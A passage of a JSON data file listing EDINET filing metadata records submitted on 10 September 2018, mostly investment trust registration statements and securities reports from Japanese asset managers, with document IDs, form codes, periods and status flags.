"fundCode": "G05610",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:05",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 30,
"docID": "S100DZYZ",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G05418",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:06",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 31,
"docID": "S100DZZ1",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G05418",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:06",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第22期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 32,
"docID": "S100DYLB",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G11003",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:06",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 33,
"docID": "S100DQ2Z",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11932",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-06-13",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:06",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第2期(平成29年6月13日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 34,
"docID": "S100DZYV",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G03651",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:07",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 35,
"docID": "S100E0DO",
"edinetCode": "E11776",
"secCode": null,
"JCN": "9010001065933",
"filerName": "あいグローバル・アセット・マネジメント株式会社",
"fundCode": "G09373",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:07",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 36,
"docID": "S100DZLX",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G07774",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:07",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 37,
"docID": "S100E2J2",
"edinetCode": "E06264",
"secCode": null,
"JCN": "6010001098507",
"filerName": "JPモルガン・アセット・マネジメント株式会社",
"fundCode": "G07438",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:07",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第18期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 38,
"docID": "S100DZM0",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G07774",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:08",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第17期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 39,
"docID": "S100DPGZ",
"edinetCode": "E12441",
"secCode": null,
"JCN": "3010001062358",
"filerName": "岡三アセットマネジメント株式会社",
"fundCode": "G02004",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:08",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 40,
"docID": "S100E2RI",
"edinetCode": "E30689",
"secCode": null,
"JCN": "4010001158535",
"filerName": "あおぞら投信株式会社",
"fundCode": "G10831",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:08",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CIPK",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 41,
"docID": "S100DZJT",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10987",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:08",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第12期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 42,
"docID": "S100E1X9",
"edinetCode": "E08957",
"secCode": null,
"JCN": "4010401049128",
"filerName": "三井住友アセットマネジメント株式会社",
"fundCode": "G05610",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-14",
"periodEnd": "2018-06-13",
"submitDateTime": "2018-09-10 09:09",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第21期(平成29年12月14日-平成30年6月13日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 43,
"docID": "S100DPH0",
"edinetCode": "E12441",
"secCode": null,
"JCN": "3010001062358",
"filerName": "岡三アセットマネジメント株式会社",
"fundCode": "G08304",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 44,
"docID": "S100DZSQ",
"edinetCode": "E06433",
"secCode": null,
"JCN": "3010001034076",
"filerName": "東京海上アセットマネジメント株式会社",
"fundCode": "G10742",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 45,
"docID": "S100DMDM",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11932",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 46,
"docID": "S100E2J3",
"edinetCode": "E06264",
"secCode": null,
"JCN": "6010001098507",
"filerName": "JPモルガン・アセット・マネジメント株式会社",
"fundCode": "G07438",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CI3D",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 47,
"docID": "S100E2NJ",
"edinetCode": "E13000",
"secCode": null,
"JCN": "4010001069955",
"filerName": "フランクリン・テンプルトン・インベストメンツ株式会社",
"fundCode": "G08227",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CIXS",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 48,
"docID": "S100DYXY",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10551",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:09",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第8期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 49,
"docID": "S100E298",
"edinetCode": "E12434",
"secCode": null,
"JCN": "7010001031160",
"filerName": "損保ジャパン日本興亜アセットマネジメント株式会社",
"fundCode": "G12361",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:09",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 50,
"docID": "S100E05B",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G12037",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:10",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 51,
"docID": "S100DZSV",
"edinetCode": "E06433",
"secCode": null,
"JCN": "3010001034076",
"filerName": "東京海上アセットマネジメント株式会社",
"fundCode": "G10742",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:11",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第7期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 52,
"docID": "S100E1NK",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G11945",
"ordinanceCode": "030",
"formCode": "995000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:11",
"docDescription": "臨時報告書(内国特定有価証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": "第29条第2項第4号",
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 53,
"docID": "S100DZJS",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10987",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:11",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 54,
"docID": "S100DYPU",
"edinetCode": "E12431",
"secCode": null,
"JCN": "3010001068479",
"filerName": "BNPパリバ・アセットマネジメント株式会社",
"fundCode": "G05226",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:11",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第23期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 55,
"docID": "S100E1VS",
"edinetCode": "E10677",
"secCode": null,
"JCN": "9010001021473",
"filerName": "アセットマネジメントOne株式会社",
"fundCode": "G12760",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-11",
"periodEnd": "2018-12-14",
"submitDateTime": "2018-09-10 09:11",
"docDescription": "半期報告書(内国投資信託受益証券)-第1期(平成29年12月11日-平成30年12月14日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 56,
"docID": "S100DYYS",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12597",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:12",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第2期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 57,
"docID": "S100DYXW",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10551",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:12",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 58,
"docID": "S100E00U",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01297",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:12",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第37期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 59,
"docID": "S100DZM3",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G10159",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:12",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 60,
"docID": "S100E2RG",
"edinetCode": "E30689",
"secCode": null,
"JCN": "4010001158535",
"filerName": "あおぞら投信株式会社",
"fundCode": "G10831",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:12",
"docDescription": "半期報告書(内国投資信託受益証券)-第4期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 61,
"docID": "S100E2OZ",
"edinetCode": "E02784",
"secCode": "99920",
"JCN": "6010501014707",
"filerName": "株式会社理研グリーン",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "043000",
"docTypeCode": "140",
"periodStart": "2018-05-01",
"periodEnd": "2018-07-31",
"submitDateTime": "2018-09-10 09:13",
"docDescription": "四半期報告書-第63期第3四半期(平成30年5月1日-平成30年7月31日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 62,
"docID": "S100DYYM",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G12597",
"ordinanceCode": "030",
"formCode": "04A000",
"docTypeCode": "030",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:14",
"docDescription": "有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 63,
"docID": "S100E00V",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G01297",
"ordinanceCode": "030",
"formCode": "04A001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:14",
"docDescription": "訂正有価証券届出書(内国投資信託受益証券)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100CFEN",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 64,
"docID": "S100DZM5",
"edinetCode": "E10439",
"secCode": null,
"JCN": "4010001027269",
"filerName": "ピクテ投信投資顧問株式会社",
"fundCode": "G10159",
"ordinanceCode": "030",
"formCode": "10A000",
"docTypeCode": "160",
"periodStart": "2017-12-12",
"periodEnd": "2018-12-10",
"submitDateTime": "2018-09-10 09:14",
"docDescription": "半期報告書(内国投資信託受益証券)-第5期(平成29年12月12日-平成30年12月10日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 65,
"docID": "S100E2P4",
"edinetCode": "E02784",
"secCode": "99920",
"JCN": "6010501014707",
"filerName": "株式会社理研グリーン",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "042000",
"docTypeCode": "135",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 09:14",
"docDescription": "確認書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 66,
"docID": "S100DZQM",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G08824",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:14",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第12期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 67,
"docID": "S100DYY0",
"edinetCode": "E11518",
"secCode": null,
"JCN": "9010001034450",
"filerName": "三菱UFJ国際投信株式会社",
"fundCode": "G10935",
"ordinanceCode": "030",
"formCode": "07A000",
"docTypeCode": "120",
"periodStart": "2017-12-12",
"periodEnd": "2018-06-11",
"submitDateTime": "2018-09-10 09:15",
"docDescription": "有価証券報告書(内国投資信託受益証券)-第7期(平成29年12月12日-平成30年6月11日)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
